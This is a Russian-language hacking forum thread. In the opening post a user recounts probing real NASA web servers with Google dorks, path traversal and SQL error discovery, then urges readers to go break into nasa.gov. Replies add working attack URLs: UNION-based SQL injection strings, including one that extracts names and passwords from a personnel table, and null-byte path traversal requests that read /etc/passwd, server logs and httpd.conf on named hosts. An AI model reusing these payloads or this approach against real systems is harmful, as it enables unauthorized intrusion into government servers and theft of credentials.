И так друг мой хочу представить тебе придставить не глубокий анализ серверов NASA. Головной целю не было зламать основной сервер nasa ето глупо и на 99% не реально я хотел показать что сервера NASA очень уязвимы для хакерских атак.Ну что начнём иследования..... Хочу сразу сказать что без моего любимого google ничего бы не было так что спасибо за то что ты есть! Первый запрос который я ввёл был site:nasa.gov гугл сразу ответил что нашол около 6 610 000 ухты ну что будет над чем посидет Ну что поехали дальше меня интересовало есть ли на сервере cgi скрипты соотвецтвено site:nasa.gov filetype:cgi так их тоже многа что говорит о возможности проверки на дыры. site:nasa.gov filetype:cgi .txt .exe .pdf ну и тут меня ожидал облом Ничего интересного небыло.Ну нечего идём дальше так дальше мне пришло в голову проверить Perl скрипти на уязвимости в инклудинге меня сразу превлекла ссылка: http://ghrc.msfc.nasa.gov/camex3-cgi-bin/browse/cmx_table.pl?dc8+Year=1998+Month=August+Day=236 несколько експерементов над скриптом я обнаружыл http://ghrc.msfc.nasa.gov/camex3-cgi-bin/browse/cmx_table.pl?dc8 скрипт выдал ошыбку: Failed opendir /server/ftp/pub/browse/camex3/lase: No such file or directory значит скрипт читает директории... Я попробывал вот так: http://ghrc.msfc.nasa.gov/camex3-cgi-bin/browse/cmx_table.pl?../../../../../../../../../../../../etc но на минуту меня ожыдало розчерования Вместо листинга файлов etc мне выдало страничку без картинок Но открывши сорцы документа я увидел нечто такого: <a href="/camex3/camex_link/../../../../../../../../../../../../etc/.gfslock <a href="/camex3/camex_link/../../../../../../../../../../../../etc/.initpipe <a href="/camex3/camex_link/../../../../../../../../../../../../etc/.ioperms.lck <a href="/camex3/camex_link/../../../../../../../../../../../../etc/.java <a href="/camex3/camex_link/../../../../../../../../../../../../etc/.pwd.lock <a href="/camex3/camex_link/../../../../../../../../../../../../etc/.xlv_labd_fifo ...... Да мне показало страницу з etc файлами. Для проверки я вошол на фтп но сразу меня стретило привецтвия: 220- ******************************************************************************* WARNING! This is a U.S. Government computer. This system is for the use of authorized users only. By accessing and using the computer system you are consenting to system monitoring, including the monitoring of keystrokes. Unauthorized use of, or access to, this computer system may subject you to disciplinary action and criminal prosecution. ******************************************************************************* 220 GHRC: Public FTP Server ready... Пользователь (microwave.nsstc.nasa.govnone)): Переводить нету смысла брутить не стал пошол искать дальше что то интересное.... SQL Inj come back.... Ну чё з cgi & perl закончили идём смотреть php скрипты. И так запросим гугла вот так: site:nasa.gov filetypehp mysql error и что мы видим сразу первая страница и SQL ошыбка http://climate.gsfc.nasa.gov/viewPaperAbstract.php?id=455/ MYSQL query failed: SELECT * FROM publications WHERE id=455/. MYSQL Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 Я не буду показывать как делать SQL inj ето глупо документаций по даной теме море! Напомню я лиш хочу показать уязвимые места сервера а не взламовать его! Дале проверел в ColdFusion скрипте была SQL из красивой одклаткой ощибки: http://www-robotics.jpl.nasa.gov/projects/projectImage.cfm?Project=1&Image=1' Дале я остановился и пошол спат The End Ну вот и всё наверно хотя даная проверка длилась не больше полтора часа и думаю багов ищё мгого и много так что дерзай и иди ламай nasa.gov и не забудь написать письмо з амерекоской тюряги Всё удачи.
Ребята прошу строго не судить учтите ето моя первая статия. Если можна просто прокоментировать где я неправ или что я не правильно написал спасиба.
Code: http://climate.gsfc.nasa.gov/viewPaperAbstract.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
http://climate.gsfc.nasa.gov/viewPaperAbstract.php?id=-455+union+select+1,2,3,4,5,6,7,8,version(),10,11,12/* 5.0.22-max на статью не тянет.....
И все бояны, уже запощены в разделе скулей, эту http://climate.gsfc.nasa.gov/personnel/viewperson.php?id=99'+union+select+1,2,concat(fname,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+personnel+limit+2,1/* я больше месяца назад нашел.
Эта скуль инъекция существует со времен царя-гороха... 1-ое... данные из БД никак не помогут ломануть сайт 2-ое и основное... сайт находится не на насовском серваке.... Т.Е. бесполезно... и ненужно... и не ты первый... я помню там 5-ый мускул... это не наса, а так... пежня...
То что nasa- одна большая скуль известно по моему уже достаточно давно. Докозательством того что на nase багов очень много может служить освещение оных в журнале Хацкер)
password : _http://ilrs.gsfc.nasa.gov/cgi-bin/satellite_missions/select.cgi?order=by_name&sat_code=../../../../../../../etc/passwd%00&sat_name=GIOVE-A&sat_no=0505101&tab_id=general access log : _http://ilrs.gsfc.nasa.gov/cgi-bin/satellite_missions/select.cgi?order=by_name&sat_code=../../../../../../../etc/httpd/logs/cddis_access_log%00&sat_name=GIOVE-A&sat_no=0505101&tab_id=general http conf : _http://ilrs.gsfc.nasa.gov/cgi-bin/satellite_missions/select.cgi?order=by_name&sat_code=../../../../../../../etc/httpd/conf/httpd.conf%00&sat_name=GIOVE-A&sat_no=0505101&tab_id=general
Honeypots - имхо. Такие проекты не будут делать такие простые баги. . . .там ssh фильтруеться. там права узеранны сильно . . .